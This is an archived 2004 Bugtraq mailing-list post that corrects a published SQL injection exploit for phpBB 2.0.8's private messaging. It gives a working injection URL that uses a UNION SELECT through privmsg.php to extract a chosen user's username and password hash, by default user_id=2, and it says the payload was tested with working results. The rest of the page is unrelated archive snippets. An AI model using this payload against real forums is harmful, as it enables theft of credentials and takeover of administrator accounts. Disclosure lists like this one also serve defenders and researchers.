phpBB 2.0.8 Exploit

From: JeiAr (security_at_gulftech.org)
Date: 03/28/04

  • Next message: JeiAr: "PhotoPost PHP Pro Multiple Vulnerabilities"
    Date: 28 Mar 2004 18:59:05 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    Hi guys,

     After playing around with the private message SQL injection issue on a forum that I admin I noticed that the exploit code posted in the authors post doesn't work correctly. Here is why:

    Both the TO and FROM fields hold the username and md5 hash in his exploit. The problem is each field only is able to hold 25 bytes at most (at least on the forums I tested it, they were all 2.0.8). Well, MD5 hash is 32 bytes, so you may get what looks like a valid hash @ first glance, but it doesn't work as it is an incomplete hash. Below is an example that stores the username in the SUBJECT of the PM and the MD5 hash in the BODY of the PM. It was tested on a few versions with working results. Of course the user_id=2 can be replaced with whatever user_id someone wants.

    /privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*

    Hope this helps :)

    JeiAr


  • Next message: JeiAr: "PhotoPost PHP Pro Multiple Vulnerabilities"

    Relevant Pages

    • Re: where in registry can i change internet options: general & con
      ... please understand that your forum CAN resolve the issue but choose NOT to. ... established - the incompetence of leaving registry open to changes by my IT ... > And keep in mind that if your admin. ...
      (microsoft.public.windowsxp.basics)
    • Re: Edna bricht aus!
      ... mit der Hintergrundmusik in Clinch gekommen - deswegen habe man .wav ... Aber *WAGT* es einmal in einem offiziellen Forum in gelinder Form einem ... Admin zusagen, er habe einfach in technischer Hinsicht keine Ahnung. ... um die EXE zu hacken. ...
      (de.rec.spiele.computer.adventure)
    • Re: Problems writing to clisp mailing list
      ... > of the forum for approval. ... > the admin still had not time to approve it. ... BTW, I use yahoo email system for the list, ...
      (comp.lang.lisp)
    • Re: SRI issues: Busy moderators and ridiculous rules sabotage discussions
      ... to dedicate more time to the forum and not slow down our discussions. ... I also suggest that Hajj Abujamal should be dismissed as an admin, ... just trying to confuse Muslims to harm Islam. ...
      (soc.religion.islam)
    • Re: animierte gifs machen nur einen turn
      ... herzlichen Dank für Deine konstruktiven Ratschläge. ... Allerdings habe ich inzwischen in einem anderen Forum ... >Dein Admin hat gar nichts einzustellen. ... >Firewall, oder ist dafür auch Dein Admin zuständig? ...
      (microsoft.public.de.german.inetexplorer.ie6)

  • Quantcast